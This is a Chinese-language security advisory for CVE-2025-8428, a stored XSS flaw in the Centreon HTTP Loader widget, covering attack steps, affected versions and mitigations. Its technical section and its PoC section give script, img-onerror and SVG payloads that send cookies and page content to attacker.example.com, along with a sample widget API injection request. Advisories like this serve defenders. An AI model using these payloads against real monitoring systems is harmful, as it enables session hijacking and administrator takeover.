CVE-2025-8428 Centreon Infra Monitoring HTTP Loader存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-8428

漏洞类型

存储型跨站脚本攻击（Stored XSS）

CVSS评分

6.8 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

Centreon Infra Monitoring（HTTP Loader widget模块）

漏洞概述

CVE-2025-8428是Centreon Infra Monitoring平台HTTP Loader widget模块中存在的一个存储型跨站脚本（Stored XSS）漏洞。该漏洞源于Web页面生成过程中对用户输入的不当中和（Improper Neutralization of Input During Web Page Generation），属于OWASP Top 10中常见的注入类安全缺陷。Centreon是一款广泛使用的开源IT基础设施监控解决方案，被大量企业用于监控网络设备、服务器和应用程序的运行状态。该漏洞允许低权限认证用户通过精心构造的恶意负载注入到HTTP Loader widget中，当其他用户（尤其是具有更高权限的管理员）查看受感染的监控面板或仪表板时，恶意脚本将在受害者浏览器中自动执行。由于该漏洞为存储型XSS，恶意负载会持久化保存在后端数据库中，每次受影响的页面被访问时都会触发攻击，影响范围持续扩大。CVSS 3.1评分为6.8分，评定为中危级别，攻击者需要低权限认证（PR:L）并需要受害者进行用户交互（UI:R），但其影响范围为Changed（S:C），意味着漏洞影响可超越受攻击组件本身，机密性影响为高（C:H），完整性和可用性不受影响。该漏洞影响Centreon多个版本分支，包括23.10.x、24.04.x和24.10.x系列，已在24.10.13、24.04.18和23.10.28版本中修复。

技术细节

该漏洞的核心问题在于Centreon Infra Monitoring的HTTP Loader widget模块在处理用户输入时，未对输入数据进行充分的过滤、转义或编码，导致恶意JavaScript代码能够被持久化存储并在后续页面渲染时执行。具体技术原理如下：

1. **输入注入点**：HTTP Loader widget允许低权限用户配置HTTP请求相关的参数，如URL、请求头、认证信息等。攻击者可以在这些字段中注入恶意JavaScript代码或HTML标签。

2. **存储机制**：由于Centreon将widget的配置信息存储在后端数据库中，恶意负载随之持久化保存，不会因会话结束而失效。

3. **输出渲染缺陷**：当其他用户（特别是管理员）访问包含该widget的监控仪表板时，服务器从数据库读取配置数据并直接渲染到HTML页面中，未对存储的内容进行适当的HTML实体编码或上下文敏感的转义处理。

4. **攻击执行**：受害者的浏览器解析包含恶意脚本的HTML内容，在其权限上下文中执行JavaScript代码，可窃取会话Cookie、CSRF Token，或通过AJAX请求以受害者身份执行特权操作（如创建管理员账户、修改监控配置等）。

利用方式：攻击者首先需要一个低权限的Centreon账户，通过widget配置界面在HTTP Loader widget的相关字段中注入XSS负载（如`<script>document.location='https://attacker.com/steal?c='+document.cookie</script>`），然后诱导具有更高权限的用户查看包含该widget的仪表板页面，即可完成攻击。

攻击链分析

STEP 1

步骤1：获取低权限账户

攻击者通过合法注册、社会工程或其他方式获取Centreon Infra Monitoring平台的低权限用户账户。

STEP 2

步骤2：构造恶意负载

攻击者精心构造包含JavaScript代码的XSS负载，用于窃取会话凭证或执行特权操作。

STEP 3

步骤3：注入到HTTP Loader Widget

攻击者通过widget配置界面，将恶意负载注入到HTTP Loader widget的输入字段中（如URL、自定义请求头等）。

STEP 4

步骤4：持久化存储

恶意负载随widget配置保存到Centreon后端数据库中，形成持久化的存储型XSS。

STEP 5

步骤5：诱导受害者访问

攻击者通过共享仪表板链接、社交工程等方式诱导管理员或高权限用户访问包含恶意widget的监控页面。

STEP 6

步骤6：脚本执行与数据窃取

受害者在查看仪表板时，恶意JavaScript在其浏览器中执行，窃取会话Cookie、CSRF Token等敏感信息，攻击者可利用这些信息冒充受害者执行特权操作。

STEP 7

步骤7：权限提升与横向移动

利用窃取的会话凭证，攻击者可以提升权限、修改监控配置、添加后门账户，甚至访问受监控的内部系统和敏感数据。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2025-8428 - Centreon HTTP Loader Widget Stored XSS PoC -->
<!-- The following payload demonstrates the stored XSS injection in HTTP Loader widget configuration -->

<!-- Step 1: Attacker logs in with low-privilege credentials -->
<!-- Step 2: Navigate to widget configuration page for HTTP Loader widget -->
<!-- Step 3: Inject malicious payload into vulnerable input field (e.g., URL or header parameter) -->

<!-- Example XSS Payload 1: Cookie Stealing -->
<script>
  var img = new Image();
  img.src = "https://attacker.example.com/steal?cookie=" + document.cookie + "&session=" + document.querySelector('meta[name="session-id"]').content;
</script>

<!-- Example XSS Payload 2: Event Handler Injection (in case <script> tags are filtered) -->
<img src=x onerror="fetch('https://attacker.example.com/exfil', {method:'POST', body:JSON.stringify({cookies:document.cookie, dom:document.body.innerHTML})})">

<!-- Example XSS Payload 3: SVG-based XSS -->
<svg onload="var x=new XMLHttpRequest();x.open('GET','https://attacker.example.com/?d='+btoa(document.cookie));x.send();">

<!-- Step 4: Save the widget configuration (payload is now stored in database) -->
<!-- Step 5: Wait for an admin/high-privilege user to view the dashboard containing this widget -->
<!-- Step 6: The malicious script executes in the victim's browser, exfiltrating sensitive data -->

<!-- Automated exploitation via Centreon API (pseudo-code) -->
/*
POST /centreon/api/latest/configuration/widgets HTTP/1.1
Host: target-centreon.example.com
Content-Type: application/json
Cookie: PHPSESSID=attacker_session

{
  "widget_type": "http-loader",
  "parameters": {
    "url": "https://internal-api.example.com/metrics",
    "custom_header": "<img src=x onerror='alert(document.cookie)'>"
  }
}
*/

影响范围

Centreon Infra Monitoring 24.10.0 < 24.10.13

Centreon Infra Monitoring 24.04.0 < 24.04.18

Centreon Infra Monitoring 23.10.0 < 23.10.28

防御指南

临时缓解措施

在无法立即升级的情况下，建议采取以下临时缓解措施：1）限制低权限用户对HTTP Loader widget的配置权限，仅允许受信用户创建和修改widget；2）在Web服务器或反向代理层面部署WAF规则，过滤常见的XSS负载模式（如`<script>`标签、事件处理器等）；3）为所有会话Cookie设置HttpOnly属性，阻止JavaScript直接访问Cookie信息；4）实施Content Security Policy（CSP），通过设置`Content-Security-Policy` HTTP响应头限制内联脚本的执行；5）定期审查widget配置，检测并清理可疑的注入内容；6）加强用户安全意识培训，避免点击可疑链接或访问未知仪表板；7）监控Centreon访问日志，识别异常的会话行为和潜在的XSS攻击迹象。